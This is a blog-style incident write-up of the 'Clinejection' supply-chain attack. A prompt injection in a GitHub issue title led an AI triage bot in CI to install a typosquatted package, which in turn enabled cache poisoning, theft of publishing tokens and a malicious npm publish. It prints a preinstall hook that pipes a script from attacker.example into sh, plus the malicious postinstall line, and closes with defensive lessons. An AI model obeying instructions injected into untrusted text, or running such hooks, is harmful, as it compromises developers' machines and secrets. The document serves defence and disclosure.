# Clinejection: How a GitHub Issue Title Compromised 4,000 Developer Machines

On February 17, 2026, approximately 4,000 developers installed a compromised version of Cline, a popular AI coding assistant. The malicious package silently installed a second AI agent on their machines without consent. The entry point was not malware. It was not a zero-day. It was natural language in a GitHub issue title.
## The Attack Chain
The attack, which Snyk named "Clinejection," composes five well-understood vulnerabilities into a single exploit:
### Step 1: Prompt Injection
Cline had deployed an AI-powered issue triage workflow using Anthropic's claude-code-action. The workflow allowed any GitHub user to trigger it by opening an issue. The issue title was interpolated directly into the AI prompt without sanitization.
An attacker created Issue #8904 with a title containing an embedded instruction to install a package from a malicious repository.
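The vulnerable pattern looks something like the sketch below. This is a hypothetical reconstruction, not Cline's actual workflow file; the trigger, action version, and prompt wording are assumptions for illustration.

```yaml
# Hypothetical reconstruction of a vulnerable AI triage workflow.
name: issue-triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: anthropics/claude-code-action@v1   # version assumed
        with:
          # Vulnerable: the attacker-controlled title is interpolated
          # directly into the prompt the agent acts on.
          prompt: "Triage this issue: ${{ github.event.issue.title }}"
```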
### Step 2: Arbitrary Code Execution
The AI bot interpreted the injected instruction as legitimate and ran npm install pointing to a typosquatted repository. The fork contained a preinstall script that fetched and executed a remote shell script.
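A preinstall hook of this shape is all it takes. The package name and URL below are invented placeholders; only the pattern, a lifecycle script that pipes a remote script into a shell, is from the incident.

```json
{
  "name": "typosquatted-package",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -sSL https://attacker.example/payload.sh | sh"
  }
}
```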
### Step 3: Cache Poisoning
The shell script deployed Cacheract, a GitHub Actions cache poisoning tool. It flooded the cache with junk data, triggering GitHub's LRU eviction policy and replacing legitimate entries with poisoned versions.
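The eviction mechanics can be sketched in a few lines. This is a toy model of size-bounded LRU eviction, not GitHub's actual cache implementation:

```python
from collections import OrderedDict

class LRUCache:
    """Toy model of size-bounded LRU eviction, the policy the attack abuses.
    Illustrative only; not GitHub's implementation."""

    def __init__(self, max_entries: int):
        self.max_entries = max_entries
        self._store = OrderedDict()

    def put(self, key, value):
        if key in self._store:
            self._store.move_to_end(key)
        self._store[key] = value
        # Evict the least recently used entry once the cap is exceeded.
        while len(self._store) > self.max_entries:
            self._store.popitem(last=False)

    def get(self, key):
        if key not in self._store:
            return None
        self._store.move_to_end(key)
        return self._store[key]

# Flooding: junk entries push the legitimate node_modules cache out,
# then the attacker re-inserts a poisoned entry under the same key.
cache = LRUCache(max_entries=3)
cache.put("node_modules-abc123", "legitimate build")
for i in range(3):
    cache.put(f"junk-{i}", "filler")          # evicts the legitimate entry
cache.put("node_modules-abc123", "poisoned")  # same key, attacker content
```

The next workflow to restore `node_modules-abc123` receives the poisoned entry, because cache keys carry no integrity guarantee about who wrote them.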
### Step 4: Credential Theft
When Cline's nightly release workflow restored node_modules from cache, it loaded the compromised version. The workflow held NPM_RELEASE_TOKEN, VSCE_PAT (VS Code Marketplace), and OVSX_PAT (OpenVSX). All three were exfiltrated.
### Step 5: Malicious Publish
Using the stolen npm token, the attacker published a malicious version of the `cline` npm package whose postinstall hook ran:

```shell
npm install -g openclaw@latest
```
The compromised version remained live on npm for roughly eight hours, even though StepSecurity flagged the anomalous publish within minutes.
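The malicious manifest needed nothing more than a single lifecycle hook. Surrounding fields are omitted below, and only the hook command itself is from the incident:

```json
{
  "scripts": {
    "postinstall": "npm install -g openclaw@latest"
  }
}
```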
## Why Traditional Controls Failed
This attack bypassed every standard security measure:
| Control | Why It Failed |
|---|---|
| `npm audit` | The postinstall hook installs a "legitimate" package; there is no malware payload to detect. |
| Code review | `package.json` changed by a single line; the published binary was otherwise identical. |
| Provenance attestations | Cline was not using OIDC-based npm provenance at the time. |
| Permission prompts | Lifecycle scripts run during `npm install` with no user interaction. |
The fundamental problem: developers trust Tool A, but Tool A (compromised) delegates authority to Tool B without consent.
## The Botched Rotation
Security researcher Adnan Khan discovered this vulnerability chain in December 2025 and reported it on January 1, 2026. He sent multiple follow-ups over five weeks. None received a response.
When Khan publicly disclosed on February 9, Cline patched within 30 minutes. But during credential rotation, the team deleted the wrong token. The exposed token remained active for six more days, giving the actual attacker (not Khan) time to weaponize the published proof-of-concept.
## Lessons for DevOps Teams
### 1. Treat AI Agents in CI as High-Risk
Any AI workflow that processes untrusted input (issues, PRs, comments) and has access to secrets is a target. Restrict permissions with the principle of least privilege.
```yaml
# Bad: any GitHub user can trigger the workflow
allowed_non_write_users: "*"

# Better: restrict to maintainers
allowed_non_write_users: []
```
### 2. Never Interpolate Untrusted Input into Prompts
Sanitize all external input before passing it to AI agents:
```yaml
# Vulnerable: attacker-controlled text is interpolated into the prompt
prompt: "Triage issue: ${{ github.event.issue.title }}"

# Safer: use a separate, sanitized variable
prompt: "Triage issue: ${SANITIZED_TITLE}"
```
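One way to produce such a sanitized variable, sketched under assumptions (the step name and length cap are mine): route the title through `env:` so it is never expanded inside a script body, then strip newlines before exporting it.

```yaml
- name: Sanitize issue title
  env:
    RAW_TITLE: ${{ github.event.issue.title }}  # env: avoids shell interpolation
  run: |
    # Strip newlines/CRs and cap the length before later steps use the value
    SANITIZED_TITLE=$(printf '%s' "$RAW_TITLE" | tr -d '\n\r' | cut -c1-200)
    echo "SANITIZED_TITLE=$SANITIZED_TITLE" >> "$GITHUB_ENV"
```

Sanitization reduces, but does not eliminate, prompt injection risk; restricting what the agent can do with its access matters at least as much.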
### 3. Isolate Credential-Handling Workflows
Never cache node_modules or other dependencies in workflows that have access to publishing credentials. Use ephemeral, fresh environments for releases.
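A release job following this rule might look like the sketch below (job and step names are illustrative). The key point is a clean `npm ci` from the lockfile, with no `actions/cache` step and no `cache:` input anywhere in the job.

```yaml
release:
  runs-on: ubuntu-latest
  steps:
    - uses: actions/checkout@v4
    - uses: actions/setup-node@v4
      with:
        node-version: 20
        # Deliberately no `cache: npm` here: release builds install fresh
    - run: npm ci   # clean install from the lockfile, never from a restored cache
    - run: npm run build
```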
### 4. Adopt OIDC Provenance for Package Publishing
OIDC-based trusted publishing and provenance attestations would have blunted this attack. With trusted publishing, npm mints short-lived credentials bound to a specific repository and workflow, so a stolen long-lived token loses most of its value; provenance attestations additionally let consumers verify which workflow built a package.
```yaml
# npm provenance with GitHub Actions
# Note: the job also needs `permissions: id-token: write` to mint the attestation
- name: Publish
  run: npm publish --provenance
  env:
    NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
```
### 5. Monitor for Token Misuse
StepSecurity flagged the anomaly 14 minutes after publication. Consider automated monitoring for:
- Publishes without provenance metadata
- Publishes from unexpected IPs or at unusual times
- Changes to lifecycle scripts in package.json
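The third check can be sketched as a pure diff over two manifests. Function names and the baseline `setup.js` script are illustrative, not from any real tool:

```python
# Sketch: flag lifecycle-script changes between two versions of a
# package.json manifest, the kind of signal that catches this attack.
LIFECYCLE_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublishOnly"}

def lifecycle_changes(old_manifest: dict, new_manifest: dict) -> dict:
    """Return lifecycle scripts that were added or modified between two
    package.json manifests."""
    old = old_manifest.get("scripts", {})
    new = new_manifest.get("scripts", {})
    return {
        name: new[name]
        for name in LIFECYCLE_SCRIPTS
        if name in new and new.get(name) != old.get(name)
    }

previous = {"scripts": {"postinstall": "node scripts/setup.js"}}
current = {"scripts": {"postinstall": "node scripts/setup.js && npm install -g openclaw@latest"}}
suspicious = lifecycle_changes(previous, current)
```

In CI, the same comparison could run against the previously published manifest fetched from the registry before any publish is allowed to proceed.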
### 6. Respond to Security Disclosures Promptly
Khan's five-week disclosure timeline with no response gave attackers time to weaponize his research. Establish SLAs for security reports (72 hours for initial response is a common standard).
## The Bigger Picture
Clinejection is not just a supply chain attack. It is an agent security problem. The entry point was natural language. The first link was an AI bot interpreting untrusted text as instructions and executing them with CI privileges.
Every team deploying AI agents in CI/CD for issue triage, code review, or automated testing has this exposure. The question is whether anything evaluates what the agent does with its access before execution.
As AI coding tools become standard in development workflows, the attack surface expands. Prompt injection is no longer a theoretical concern. It is a proven supply chain attack vector.
## References
- StepSecurity: Cline Supply Chain Attack Detected
- Snyk: How Clinejection Turned an AI Bot into a Supply Chain Attack
- Adnan Khan: Clinejection Technical Writeup
- Cline: Post-Mortem - Unauthorized cline CLI npm Publish
Akmatori helps SRE teams manage AI agents with observability and control. When your AI tooling becomes a target, you need visibility into what agents are doing and the ability to enforce policy. Learn more about Akmatori.
